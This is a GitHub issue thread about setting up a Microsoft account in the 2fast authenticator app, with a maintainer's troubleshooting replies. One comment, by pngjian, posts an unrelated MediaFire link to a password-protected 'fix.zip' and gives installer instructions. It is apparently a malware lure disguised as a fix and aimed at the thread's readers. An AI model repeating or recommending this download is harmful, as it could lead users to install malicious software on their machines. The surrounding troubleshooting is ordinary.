### ISSUE TITLE
microsoft authenticator setup not working

### ISSUE THREAD

**Issue by cgi-member** [2fast-team/2fast#159]
## not able to setup microsoft authenticator
trying to enter the code from the account.live.com from microsoft to add my authentication but secret key field says base 32 but the code on ms site has zeros and 8 and other digits

## Steps to Reproduce

open 2fast
add account
select manual input
open browser 
login to account.live.com
select security
add sign in method 
select authenticator app
select next then cant scan image
at bottom is code and url
copy code or manual enter code to account in 2fast wont be able to enter all digits or link account

Windows 10/11 Build Number:
- [ ] Windows 10 > May 2024

**Comment by pngjian** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jp-weber** [comment]
I think this might be the proprietary version from Microsoft. you would have to click the option to get the QR code for the TOTP standard displayed,

![assets_-LSGVtOTYUIkVBoYtFvK_-Ma0d_OHfWHoSpIB9UsH_-Ma0f2nSEgIZhPdmZQef_Screen Shot 2021-05-18 at 3](https://github.com/2fast-team/2fast/assets/10946850/f6f89fae-5c52-4bd4-abe5-08451e5d0f9e)

**Comment by cgi-member** [comment]
i did try that i got the qr code but the secret code does not match the normal code entry for 2fast to recognize

**Comment by jp-weber** [comment]
I cannot reproduce this, please test the steps from one of my posts again:
https://github.com/2fast-team/2fast/issues/90#issuecomment-1785866023

**Comment by cgi-member** [comment]
<img width="846" alt="1" src="https://github.com/user-attachments/assets/9d096674-2529-4cea-ae16-f22d8050be5f">
<img
<img width="543" alt="3" src="https://github.com/user-attachments/assets/a21edfcf-4ddf-400f-9fa4-85c5fcdfe397">
 width="405" alt="2" src="https://github.com/user-attachments/assets/d9c80fa9-2315-40c1-80e9-0279265f3350">
<img width="509" alt="4" src="https://github.com/user-attachments/assets/e2cf73d9-687a-4ab8-8f95-f83260886144">

**Comment by cgi-member** [comment]
followed exactly as mentioned did not work

**Comment by jp-weber** [comment]
Thanks for sharing the steps. 

As you can see in your picture, the authentication step is for the "Microsoft Authenticator" app. You must click in the first step "I want to use a different authenticator app". Only in this case the authenticator can be set up:
![grafik](https://github.com/2fast-team/2fast/assets/10946850/b73fef0d-0bd6-4833-a040-b461ff0662df)

**Comment by cgi-member** [comment]
<img width="575" alt="2" src="https://github.com/user-attachments/assets/8ccbe2c8-57af-4f30-9bf5-f11d166fc109">

**Comment by cgi-member** [comment]
i dont have that option
